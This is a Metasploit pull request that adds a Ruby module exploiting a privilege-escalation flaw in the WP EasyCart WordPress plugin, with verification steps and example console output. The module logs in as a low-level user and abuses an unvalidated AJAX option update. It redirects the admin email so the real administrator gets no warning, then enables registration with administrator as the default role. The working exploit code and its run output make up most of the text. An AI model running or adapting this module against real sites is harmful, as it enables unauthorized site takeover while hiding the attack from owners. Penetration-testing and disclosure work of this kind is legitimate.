### PR TITLE
Add WordPress WP EasyCart privilege escalation module

### DIFF
--- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary
       'License'         => MSF_LICENSE,
       'References'      =>
         [
+          ['WPVDB', '7808'],
           ['URL', 'http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure']
         ],
       'DisclosureDate'  => 'Feb 25 2015'

--- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
       info,
       'Name'            => 'WordPress WP EasyCart Plugin Privilege Escalation',
       'Description'     => %q{
-          The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.19
+          The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20
           allows authenticated users of any user level to set any system
           option via a lack of validation in the ec_ajax_update_option
           and ec_ajax_clear_all_taxrates functions located in
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def check
-    check_plugin_version_from_readme('wp-easycart', '3.0.20', '1.1.30')
+    check_plugin_version_from_readme('wp-easycart', '3.0.21', '1.1.30')
   end
 
   def username

--- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WP EasyCart Plugin Privilege Escalation',
+      'Description'     => %q{
+          The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.19
+          allows authenticated users of any user level to set any system
+          option via a lack of validation in the ec_ajax_update_option
+          and ec_ajax_clear_all_taxrates functions located in
+          /inc/admin/admin_ajax_functions.php.
+
+          The module first changes the admin e-mail address to prevent any
+          notifications being sent to the actual administrator during the
+          attack, re-enables user registration in case it has been disabled
+          and sets the default role to be administrator. This will allow for
+          the user to create a new account with admin privileges via the
+          default registration page found at /wp-login.php?action=register.
+      },
+      'Author'          =>
+        [
+          'Rob Carr <rob[at]rastating.com>' # Discovery and Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['URL', 'http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure']
+        ],
+      'DisclosureDate'  => 'Feb 25 2015'
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-easycart', '3.0.20', '1.1.30')
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def set_wp_option(name, value, cookie)
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => wordpress_url_admin_ajax,
+      'vars_get'  => { 'action' => 'ec_ajax_update_option' },
+      'vars_post' => { 'option_name' => name, 'option_value' => value },
+      'cookie'    => cookie
+    )
+
+    if res.nil?
+      vprint_error("#{peer} - No response from the target.")
+    else
+      vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+    end
+
+    return res
+  end
+
+  def run
+    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com"
+    print_status("#{peer} - Changing admin e-mail address to #{new_email}...")
+    if set_wp_option('admin_email', new_email, cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address')
+    end
+
+    print_status("#{peer} - Enabling user registrations...")
+    if set_wp_option('users_can_register', 1, cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations')
+    end
+
+    print_status("#{peer} - Setting the default user role...")
+    if set_wp_option('default_role', 'administrator', cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to set the default user role')
+    end
+
+    register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register')
+    print_good("#{peer} - Privilege escalation complete")
+    print_good("#{peer} - Create a new account at #{register_url} to gain admin access.")
+  end
+end


### PR DESCRIPTION
Due to a lack of validation in the `ec_ajax_update_option` and `ec_ajax_clear_all_taxrates` functions located in `/inc/admin/admin_ajax_functions.php`, it is possible to update any WordPress option as an authenticated non-admin user, which can in turn lead to privilege escalation and remote code execution.

The module first changes the admin e-mail address to prevent any notifications being sent to the actual administrator during the attack, re-enables user registration in case it has been disabled and sets the default role to be administrator. This will allow for the user to create a new account with admin privileges via the default registration page found at `/wp-login.php?action=register`.
## References
- CVE-ID request submitted but still pending
- https://wpvulndb.com/vulnerabilities/7808
- http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure/
## Verification
- [ ] Download and install [WordPress](https://wordpress.org/download/)
- [ ] Install a version of the wp-easycart plugin in the appropriate range from https://wordpress.org/plugins/wp-easycart/developers/
- [ ] Load msfconsole and `use auxiliary/admin/http/wp_easycart_privilege_escalation`
- [ ] Set `RHOST` to the target's address
- [ ] If running WordPress in a subdirectory, ensure to set `TARGETURI` appropriately (e.g. if running in a folder called wordpress, set `TARGETURI` to `/wordpress/`)
- [ ] Set `USERNAME` and `PASSWORD` to the credentials of the WordPress user you wish to authenticate as
- [ ] Run `check` to verify the target is vulnerable
- [ ] Run the module
## Example Output

```
msf > use auxiliary/admin/http/wp_easycart_privilege_escalation
msf auxiliary(wp_easycart_privilege_escalation) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf auxiliary(wp_easycart_privilege_escalation) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf auxiliary(wp_easycart_privilege_escalation) > set USERNAME ectest
USERNAME => ectest
msf auxiliary(wp_easycart_privilege_escalation) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(wp_easycart_privilege_escalation) > set VERBOSE true
VERBOSE => true
msf auxiliary(wp_easycart_privilege_escalation) > check

[*] 192.168.1.15:80 - Found version 3.0.20 of the plugin
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf auxiliary(wp_easycart_privilege_escalation) > run

[*] 192.168.1.15:80 - Authenticating with WordPress using ectest:toor...
[+] 192.168.1.15:80 - Authenticated with WordPress
[*] 192.168.1.15:80 - Changing admin e-mail address to eONHx@kbCxs.com...
[*] 192.168.1.15:80 - Enabling user registrations...
[*] 192.168.1.15:80 - Setting the default user role...
[+] 192.168.1.15:80 - Privilege escalation complete
[+] 192.168.1.15:80 - Create a new account at /wordpress/wp-login.php?action=register to gain admin access.
[*] Auxiliary module execution completed
```
